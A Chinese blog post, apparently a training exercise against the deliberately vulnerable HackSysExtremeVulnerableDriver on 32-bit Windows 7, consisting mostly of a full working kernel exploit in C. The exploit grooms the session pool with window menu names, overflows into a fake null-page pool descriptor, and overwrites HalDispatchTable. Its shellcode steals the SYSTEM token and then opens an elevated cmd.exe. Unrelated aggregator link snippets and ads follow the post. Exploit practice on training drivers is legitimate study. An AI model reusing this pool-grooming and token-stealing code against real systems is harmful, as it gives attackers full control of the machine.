草稿没了就和难受 简单写点把。。环境win7x32
在这里插入图片描述
在这里插入图片描述PagedPoolSession对应33,微软没有详细介绍,只是说不推荐用,这种内存可以通过窗口菜单的名字来创建,大小在win7sp0x32下我试着好像不能超过0x200,而在win7sp1x64上我试着可以超过0x300

过程没了直接贴exp吧

#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <profileapi.h>
LRESULT CALLBACK MainWProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
typedef NTSTATUS(WINAPI* PNtAllocateVirtualMemory)(HANDLE ProcessHandle,PVOID* BaseAddress,ULONG ZeroBits,PULONG AllocationSize,ULONG AllocationType,ULONG Protect);
#define MAXIMUM_FILENAME_LENGTH 255 
typedef struct SYSTEM_MODULE {ULONG                Reserved1;ULONG                Reserved2;
#ifdef _WIN64ULONG				Reserved3;
#endifPVOID                ImageBaseAddress;ULONG                ImageSize;ULONG                Flags;WORD                 Id;WORD                 Rank;WORD                 w018;WORD                 NameOffset;CHAR                 Name[MAXIMUM_FILENAME_LENGTH];
}SYSTEM_MODULE, * PSYSTEM_MODULE;typedef struct SYSTEM_MODULE_INFORMATION {ULONG                ModulesCount;SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;typedef enum _SYSTEM_INFORMATION_CLASS {SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(__in SYSTEM_INFORMATION_CLASS SystemInformationClass,__inout PVOID SystemInformation,__in ULONG SystemInformationLength,__out_opt PULONG ReturnLength);
VOID Shllecode() {_asm{int 3pop edipop esipop ebxpushadmov eax, fs: [124h]		// Find the _KTHREAD structure for the current threadmov eax, [eax + 0x50]   // Find the _EPROCESS structuremov ecx, eaxmov edx, 4				// edx = system PID(4)// The loop is to get the _EPROCESS of the systemfind_sys_pid :mov eax, [eax + 0xb8]	// Find the process activity listsub eax, 0xb8    		// List traversalcmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PIDjnz find_sys_pid// Replace the Tokenmov edx, [eax + 0xf8]mov[ecx + 0xf8], edxpopadint 3ret}}
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource,OUT PULONG Interval);
int main()
{WNDCLASSEX wnd[10000]{};HWND extraMemFindWindow[10000];WCHAR temp2[0x30];//size=0x40memset(temp2, 0x41, 0x30);int num{};char j = 1;ULONG inx{};printf("CreateWindow....... \n");for (size_t i = 0; i < 10000; i++){wnd[i].cbSize = sizeof(wnd[i]);wnd[i].lpfnWndProc = MainWProc;//防止重名if (j == '0'){j++;}else if (j == 0xff || j==0){j = 1;inx++;}temp2[inx] = j;j++;wnd[i].lpszMenuName = temp2;//防止重名if (j == '0'){j++;inx++;}else if (j == 0xff || j == 0){j = 1;inx++;}j++;temp2[inx] = j;wnd[i].lpszClassName = temp2;RegisterClassEx(&wnd[i]);extraMemFindWindow[i] = CreateWindowEx(0, wnd[i].lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);if (i> 10000 -5){num= i;break;}}printf("DestroyWindow....... \n");for (size_t i = 0; i < num; i += 0x10) {for (size_t j = 0; j < 8; j++){UnregisterClass(wnd[i+j].lpszClassName, 0);DestroyWindow(extraMemFindWindow[i+j]);extraMemFindWindow[i] = 0;}}HANDLE hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Unable to get a handle on the device\n"); return(-1); }if (hDriver == INVALID_HANDLE_VALUE) {printf("[!] Unable to get a handle on the device\n");getchar();return(-1);}HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");if (hNtdll == INVALID_HANDLE_VALUE) {printf("Could not open handle to ntdll. \n");CloseHandle(hDriver);return 1;}PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");;if (!NtAllocateVirtualMemory) {printf("Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());return 1;}PVOID baseAddress = (PVOID)0x1;SIZE_T regionSize = 0x2500;NTSTATUS ntStatus = NtAllocateVirtualMemory(GetCurrentProcess(),&baseAddress,0,&regionSize,MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,PAGE_EXECUTE_READWRITE);PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");if (query == NULL) {printf("GetProcAddress() failed.\n");return 1;}ULONG len = 0;query(SystemModuleInformation, NULL, 0, &len);PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);if (pModuleInfo == NULL) {printf("Could not allocate memory for module info.\n");return 1;}query(SystemModuleInformation, pModuleInfo, len, &len);if (len == 0) {printf("Failed to retrieve system module information\n");return 1;}PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;PCHAR kernelImage = (PCHAR)pModuleInfo->Modules[0].Name;kernelImage = strrchr(kernelImage, '\\') + 1;printf("Kernel Image Base 0x%X\n", kernelImageBase);printf("Kernel Image name %s\n", kernelImage);HMODULE userBase = LoadLibraryA(kernelImage);PVOID dispatch = (PVOID)GetProcAddress(userBase, "HalDispatchTable");dispatch = (PVOID)((ULONG)dispatch - (ULONG)userBase + (ULONG)kernelImageBase);printf("User Mode kernel image base address: 0x%X\n", userBase);printf("Kernel mode kernel image base address: 0x%X\n", kernelImageBase);printf("HalDispatchTable address: 0x%X\n", dispatch);ULONG what = (ULONG)&Shllecode;ULONG where = (ULONG)((ULONG)dispatch + sizeof(PVOID));HANDLE hDefragEvents[0x2500];HANDLE hPoolGroomEvents[0x2500];RtlZeroMemory((PCHAR)0x0, 0x1300);/*/ dt - r nt!_POOL_DESCRIPTOR*/* (PCHAR)0x0 = 1;//+ 0x000 PoolType         : PagedPool = 0n1*(PCHAR)0x4 = 1;//+0x004 PagedLock        : _KGUARDED_MUTEX*(PCHAR*)0x100 = (PCHAR)0x1208;//+ 0x100 PendingFrees : 0x1208 //This address will be written to the targetted 'where' address*(PCHAR*)0x104 = (PCHAR)0x20;//+0x104 PendingFreeDepth : 0x20 - the pending free needs to be atleast 32 to so that ExFreePoolWithTag actually free's everythingfor (unsigned int i = 0x140; i < 0x1140; i += 8) {*(PCHAR*)i = (PCHAR)where - 4;}//+0x140 ListHeads : [512] _LIST_ENTRY//+ 0x000 Flink : (PCHAR)where - 4//+ 0x004 Blink : (PCHAR)where - 4//And repeat...//The addresses of the object on the PendingFrees list which is currently 0x1208 will be written to the 'where' address when it is linked into the fron of the list//Create fake Pool headers*(PINT)0x1200 = (INT)0x060c0a00;*(PINT)0x1204 = (INT)0x6f6f6f6f;//dt nt!_POOL_HEADER 0x1200//+0x000 PreviousSize     : 0y000000000(0)//	+ 0x000 PoolIndex : 0y0000101(0x5)//	+ 0x002 BlockSize : 0y000001100(0xc)//	+ 0x002 PoolType : 0y0000011(0x3)//	+ 0x000 Ulong1 : 0x60c0a00//	+ 0x004 PoolTag : 0x6f6f6f6f//	+ 0x004 AllocatorBackTraceIndex : 0x6f6f//	+ 0x006 PoolTagHash : 0x6f6f*(PCHAR*)0x1208 = (PCHAR)0x0; //the next pointer for the pending free list, as this is NULL it will stop free'ing*(PINT)0x1260 = (INT)0x060c0a0c;*(PINT)0x1264 = (INT)0x6f6f6f6f;//dt nt!_POOL_HEADER 0x1260//+0x000 PreviousSize     : 0y000001100(0xc)//	+ 0x000 PoolIndex : 0y0000101(0x5)//	+ 0x002 BlockSize : 0y000001100(0xc)//	+ 0x002 PoolType : 0y0000011(0x3)//	+ 0x000 Ulong1 : 0x60c0a0c//	+ 0x004 PoolTag : 0x6f6f6f6f//	+ 0x004 AllocatorBackTraceIndex : 0x6f6f//	+ 0x006 PoolTagHash : 0x6f6fchar buf[0x1fc]{};memset(buf, 0x42, 0x1f8);LPDWORD dwBytesOut{};* (DWORD32*)(buf + 0x1f8 + 0x00) = 0x060a0a40;//覆盖四字节让堆从0页释放/*2: kd > dt nt!_POOL_HEADER fd521ab0+ 0x000 PreviousSize     : 0y001000000(0x40)+ 0x000 PoolIndex : 0y0000000(0)   修改后等于5+ 0x002 BlockSize : 0y000001010(0xa)+ 0x002 PoolType : 0y0100011(0x23) 修改后等于3///////////////+ 0x000 Ulong1 : 0x460a0040+ 0x004 PoolTag : 0x6d717355+ 0x004 AllocatorBackTraceIndex : 0x7355+ 0x006 PoolTagHash : 0x6d71*///如果没申请0页会这样/*Access violation - code c0000005(!!!second chance !!!)nt!ExFreePoolWithTag + 0x814:8416081a 8b9380000000    mov     edx, dword ptr[ebx + 80h]2 : kd > dd ebx00000000 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?00000010 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?00000020 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?*///拷贝前断点bp hevd+450FEDeviceIoControl(hDriver, 0x222043, buf, 0x1fc, 0, 0, dwBytesOut, NULL);printf("DestroyWindow....... \n");DebugBreak();for (int i = 0; i < num; i++) {if (extraMemFindWindow[i]){NTSTATUS ntStatus = NtAllocateVirtualMemory(GetCurrentProcess(),&baseAddress,0,&regionSize,MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,PAGE_EXECUTE_READWRITE);RtlZeroMemory((PCHAR)0x0, 0x1300);/*/ dt - r nt!_POOL_DESCRIPTOR*/*(PCHAR)0x0 = 1;//+ 0x000 PoolType         : PagedPool = 0n1*(PCHAR)0x4 = 1;//+0x004 PagedLock        : _KGUARDED_MUTEX*(PCHAR*)0x100 = (PCHAR)0x1208;//+ 0x100 PendingFrees : 0x1208 //This address will be written to the targetted 'where' address*(PCHAR*)0x104 = (PCHAR)0x20;//+0x104 PendingFreeDepth : 0x20 - the pending free needs to be atleast 32 to so that ExFreePoolWithTag actually free's everythingfor (unsigned int i = 0x140; i < 0x1140; i += 8) {*(PCHAR*)i = (PCHAR)where - 4;}//+0x140 ListHeads : [512] _LIST_ENTRY//+ 0x000 Flink : (PCHAR)where - 4//+ 0x004 Blink : (PCHAR)where - 4//And repeat...//The addresses of the object on the PendingFrees list which is currently 0x1208 will be written to the 'where' address when it is linked into the fron of the list//Create fake Pool headers*(PINT)0x1200 = (INT)0x060c0a00;*(PINT)0x1204 = (INT)0x6f6f6f6f;//dt nt!_POOL_HEADER 0x1200//+0x000 PreviousSize     : 0y000000000(0)//	+ 0x000 PoolIndex : 0y0000101(0x5)//	+ 0x002 BlockSize : 0y000001100(0xc)//	+ 0x002 PoolType : 0y0000011(0x3)//	+ 0x000 Ulong1 : 0x60c0a00//	+ 0x004 PoolTag : 0x6f6f6f6f//	+ 0x004 AllocatorBackTraceIndex : 0x6f6f//	+ 0x006 PoolTagHash : 0x6f6f*(PCHAR*)0x1208 = (PCHAR)0x0; //the next pointer for the pending free list, as this is NULL it will stop free'ing*(PINT)0x1260 = (INT)0x060c0a0c;*(PINT)0x1264 = (INT)0x6f6f6f6f;//dt nt!_POOL_HEADER 0x1260//+0x000 PreviousSize     : 0y000001100(0xc)//	+ 0x000 PoolIndex : 0y0000101(0x5)//	+ 0x002 BlockSize : 0y000001100(0xc)//	+ 0x002 PoolType : 0y0000011(0x3)//	+ 0x000 Ulong1 : 0x60c0a0c//	+ 0x004 PoolTag : 0x6f6f6f6f//	+ 0x004 AllocatorBackTraceIndex : 0x6f6f//	+ 0x006 PoolTagHash : 0x6f6fUnregisterClass(wnd[i].lpszClassName, 0);DestroyWindow(extraMemFindWindow[i]);}}printf("shellcode....... \n");//When the kernel tries to execute nt!HalDispatchTable+0x4 it will end up executing at 0x1208//Which has been preloaded with opcodes to execute our shellcode and then return/*00001208 b8ADDRESS      mov     eax, what0000120d ffd0            call    eax0000120f c9              leave00001210 c3              ret*/*(PUCHAR)0x1208 = 0xb8;*(PINT)0x1209 = (INT)what;*(PUCHAR)0x120D = 0xff;*(PUCHAR)0x120E = 0xd0;*(PUCHAR)0x120F = 0xc9;*(PUCHAR)0x1210 = 0xc3;NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtdll, "NtQueryIntervalProfile");if (!NtQueryIntervalProfile) {printf("Failed Resolving NtQueryIntervalProfile. \n");return 1;}ULONG interval = 1;NtQueryIntervalProfile(2, &interval);STARTUPINFO si = { sizeof(STARTUPINFO) };PROCESS_INFORMATION pi;ZeroMemory(&si, sizeof(si));si.cb = sizeof(si);ZeroMemory(&pi, sizeof(pi));CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);getchar();return 0;
}

总结:创建窗口的时候窗口类名字和菜单名字不能一样,太长也不行,不能有0截断否则内存大小不理想,而光销毁窗口不够还要销毁菜单,内存才释放,而且要在每销毁一次窗口就要申请一下0页构造堆,不然,我也不知道为啥,不这样他就会崩溃,然后我看0页没内存显示,不一一细说了。。完

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. oracle登录scott用户报错

    oracle登录scott用户时提示被锁定 SQL> conn scott/tiger ERROR: ORA-28000: the account is lockedWarning: You are no longer connected to ORACLE.使用管理员用户解锁 [oracle@oracle02 ~]$ sqlplus / as sysdbaSQL*Plus: Release 11.2.0.3.0 Production on Sun Jul 12 …...

    2024/4/14 13:56:32
  2. PayPal 现在还可以提现到国内银行卡么?

    PayPal里的钱直接提现的话,最近是经常会被银行退回,还要自己承担提现的手续费,有点不划算。其实,现在比较顺畅的Paypal提现办法,就是通过第三方平台来实现快速提现,不会出现被退回的问题。基本的通道有两个,如果是Paypal里的资金是电商平台的款,可以通过PayPal-->Wo…...

    2024/4/1 3:51:44
  3. 修改head节点指向下一个获得锁的节点

    基本概念 Java锁是什么 锁开销(lock overhead) 锁竞争(lock contention) 死锁(deadlock) 死锁的概念 死锁发生的条件 锁的种类 1.公平锁/非公平锁(按申请顺序分类) 2.共享锁/独享锁(按资源是否只能被一个资源持有分类) 3.互斥锁/读写锁(就是 共享锁/独享锁 的具体实现) 4…...

    2024/4/1 3:51:45
  4. 石头剪刀布人工智能代码详解

    石头剪刀布人工智能代码详解 #include <iostream> #include <fstream> #include <stdlib.h> #include <time.h>#define MAXN 3using namespace std;struct memPoint{int _list[4];int _all; };这里就没什么好说的了,stdlib与time都是随机数需要的库 m…...

    2024/4/14 15:12:09
  5. 深入理解Java虚拟机(二)Java垃圾回收看这篇就够了!

    引用《深入理解Java虚拟机》书里的一句话: Java与C++之间有一堵由内存动态分配和垃圾收集技术所围成的“高墙”,墙外面的人想进去,墙里面的人却想出来。概述 上一篇文章深入理解Java虚拟机(一)java运行时数据区域中,讲到程序计数器、虚拟机栈、本地方法栈的生灭都随线程的…...

    2024/4/27 22:49:17
  6. Linux DNS之正向解析(邮件记录、别名解析、泛域名解析)

    1、安装bind [root@localhost ~]# yum -y install bind2、修改主配置文件 [root@localhost ~]# vi /etc/named.conf 修改第13行为 listen-on port 53 { any; }; 修改第21行为 allow-query { any; };3、修改区域配置文件 [root@localhost ~]# vi /etc/named.rfc1912.zon…...

    2024/4/27 21:36:55
  7. RHCE 创建用户

    #!/bin/bash if [ ! "$1" ] then echo "Usage:/root/batchusers userfile" exit 1 fi if [ ! -e "$1" ] then echo "Input file not found" exit 1 fi for name in `cat $1` do useradd $name -s /bin/false done...

    2024/4/11 9:28:42
  8. jquery——get方法解析xml文件和json文件和getjson

    get+xmlget+jsongetJSON方法...

    2024/4/17 10:22:22
  9. Linux目录结构及文件基本操作

    Linux目录结构及文件基本操作 一.Linux目录结构Linux 的目录与 Windows 的目录的区别,或许对于一般操作上的感受来说没有多大不同,但从它们的实现机制来说是完全不同的。 一种不同是体现在目录与存储介质(磁盘,内存,DVD 等)的关系上,以往的 Windows 一直是以存储介质为主…...

    2024/4/15 12:14:59
  10. 燕窝老板利用三个步骤,3天做到600万的业绩?客户疯狂裂变的方法!

    今天为各位分享一个做燕窝老板利用小程序3天做到600万业绩的案例,从3月份到现在为止呢?他们的营业额更是高达2600万,2600万呢!是不是让你有些惊讶,是不是想知道他们是怎么做到的? 燕窝老板利用三个步骤,3天做到600万的业绩?客户疯狂裂变的方法 其实啊;他们做到的模式很…...

    2024/4/1 3:51:36
  11. 自媒体内容创作者的春天来了!

    大家好!前面一直说的都是手机今天咱们就换个新的话题吧!创作者的春天 在自媒体出现以来衍生了无数创作者,从而应验了人人皆可自媒体这句话,自然自媒体就成为了中国一大主流,有人依靠自媒体可以发家致富还有人依靠自媒体来做自己想做的事,形形色色的融入这一新行业,立即让…...

    2024/4/15 7:59:03
  12. 找到字符串中所有字母异位词

    LeetCode 438. 找到字符串中所有字母异位词 给定一个字符串 s 和一个非空字符串 p,找到 s 中所有是 p 的字母异位词的子串,返回这些子串的起始索引。 字符串只包含小写英文字母,并且字符串 s 和 p 的长度都不超过 20100。 说明: 字母异位词指字母相同,但排列不同的字符串。…...

    2024/4/18 14:44:43
  13. Synchronized和Lock的区别

    一图学完 Java锁相关基本概念 Java锁是什么 锁开销(lock overhead) 锁竞争(lock contention) 死锁(deadlock) 死锁的概念 死锁发生的条件 锁的种类 1.公平锁/非公平锁(按申请顺序分类) 2.共享锁/独享锁(按资源是否只能被一个资源持有分类) 3.互斥锁/读写锁(就是 共享锁/独…...

    2024/4/20 1:50:50
  14. java 控制台 输出进度条

    效果代码public static void main(String[] args) {int total = 100;for (int i = 0; i < total; i++) {System.out.print(GetProces(total, i+1));try {Thread.sleep(20);} catch (InterruptedException e) {e.printStackTrace();}}}static String GetProces(int total, in…...

    2024/4/14 13:57:59
  15. rhce 脚本

    用引号将参数引用起来,这样如果参数为空值,不会报错。#!/bin/shif [ "$1" = "redhat" ] then echo "fedora" else if [ "$1" = "fedora" ] then echo "redhat" else echo "/root/foo.sh redhat|fedora&qu…...

    2024/4/14 13:57:23
  16. 11.初步使用vue-router

    vue-router:Vue Router 是 Vue.js 官方的路由管理器。它和 Vue.js 的核心深度集成,让构建单页面应用变得易如反掌。https://router.vuejs.org/zh/guide/起步:<!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8">&l…...

    2024/4/25 1:30:16
  17. unbutu中的ARM字符驱动编译过程笔记(vscode)

    添加内核库文件 创建c_cpp_properties.json,添加包含ARM的内核的头文件库 {"configurations": [{"name": "Linux","includePath": ["${workspaceFolder}/**","/home/vmuser/testkernel/kernel-imx/include","…...

    2024/4/27 10:36:54
  18. Ubuntu 安装 CUDA 和 cuDNN 详细步骤

    1. 确保 nvidia 驱动已安装 先安装 nvidia 驱动,请参考前面文章 https://blog.csdn.net/wohu1104/article/details/107032493 2. 安装 CUDA 2.1 下载安装 在官网 https://developer.nvidia.com/cuda-toolkit-archive如下截图, 选择自己系统对应的 CUDA 版本, 然后点击进去,…...

    2024/4/14 13:57:18
  19. Leetcode 174.地下城游戏(Dungeon Game)

    Leetcode 174.地下城游戏 1 题目描述(Leetcode题目链接)一些恶魔抓住了公主(P)并将她关在了地下城的右下角。地下城是由 M x N 个房间组成的二维网格。我们英勇的骑士(K)最初被安置在左上角的房间里,他必须穿过地下城并通过对抗恶魔来拯救公主。 骑士的初始健康点数为一…...

    2024/4/14 13:57:03
  20. 蓝桥杯 历届真题 末尾消1

    消除尾一 1下面的代码把一个整数的二进制表示的最右边的连续的1全部变成0 如果最后一位是0,则原数字保持不变。 如果采用代码中的测试数据,应该输出: 输入:000000000000001100111 输出:000000000000001100000 输入:000000000000000001100 输出:000000000000000001100 #include…...

    2024/4/15 7:41:27

最新文章

  1. 万兆以太网MAC设计(6)IP协议报文格式详解以及IP层模块设计

    文章目录 前言&#xff1a;IPv4报文协议格式二、IP_RX模块设计2.1、模块接口2.2、模块工作过程 三、IP_TX模块设计3.1、模块接口3.2、模块工作过程 四、仿真4.1、发送端4.2、接受端 前言&#xff1a;IPv4报文协议格式 参考&#xff1a;https://sunyunqiang.com/blog/ipv4_prot…...

    2024/4/27 22:59:52
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 网络协议学习——IP协议

    IP&#xff08;Internet Protocol&#xff0c;互联网协议&#xff09;是网络中最基本的协议之一&#xff0c;负责在互联网中进行数据包的传输。下面是对IP协议的详细讲解&#xff1a; IP协议的作用 IP协议是在网络层&#xff08;第三层&#xff09;上工作的协议&#xff0c;它的…...

    2024/4/24 23:10:50
  4. 【C++】类和对象①(什么是面向对象 | 类的定义 | 类的访问限定符及封装 | 类的作用域和实例化 | 类对象的存储方式 | this指针)

    目录 前言 什么是面向对象&#xff1f; 类的定义 类的访问限定符及封装 访问限定符 封装 类的作用域 类的实例化 类对象的存储方式 this指针 结语 前言 最早的C版本&#xff08;C with classes&#xff09;中&#xff0c;最先加上的就是类的机制&#xff0c;它构成…...

    2024/4/25 20:50:57
  5. ps教程谁教的好

    在Photoshop&#xff08;PS&#xff09;教程方面&#xff0c;有多位老师被推荐为教学水平较高。以下是一些被提及的老师&#xff1a; 敬伟&#xff1a;被认为是很多人的PS启蒙老师&#xff0c;提供基本功能介绍与高级效果案例&#xff0c;教学风格被认为是免费且不拖沓的。1…...

    2024/4/26 20:36:35
  6. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/26 18:09:39
  7. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/26 20:12:18
  8. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/26 23:05:52
  9. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/27 4:00:35
  10. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  11. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  12. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/26 21:56:58
  13. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/27 9:01:45
  14. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  15. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/25 18:39:16
  16. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/25 18:39:16
  17. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  18. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/26 22:01:59
  19. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/25 18:39:14
  20. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/4/26 23:04:58
  21. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/25 2:10:52
  22. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/25 18:39:00
  23. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/26 19:46:12
  24. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/27 11:43:08
  25. 械字号医用眼膜缓解用眼过度到底有无作用?

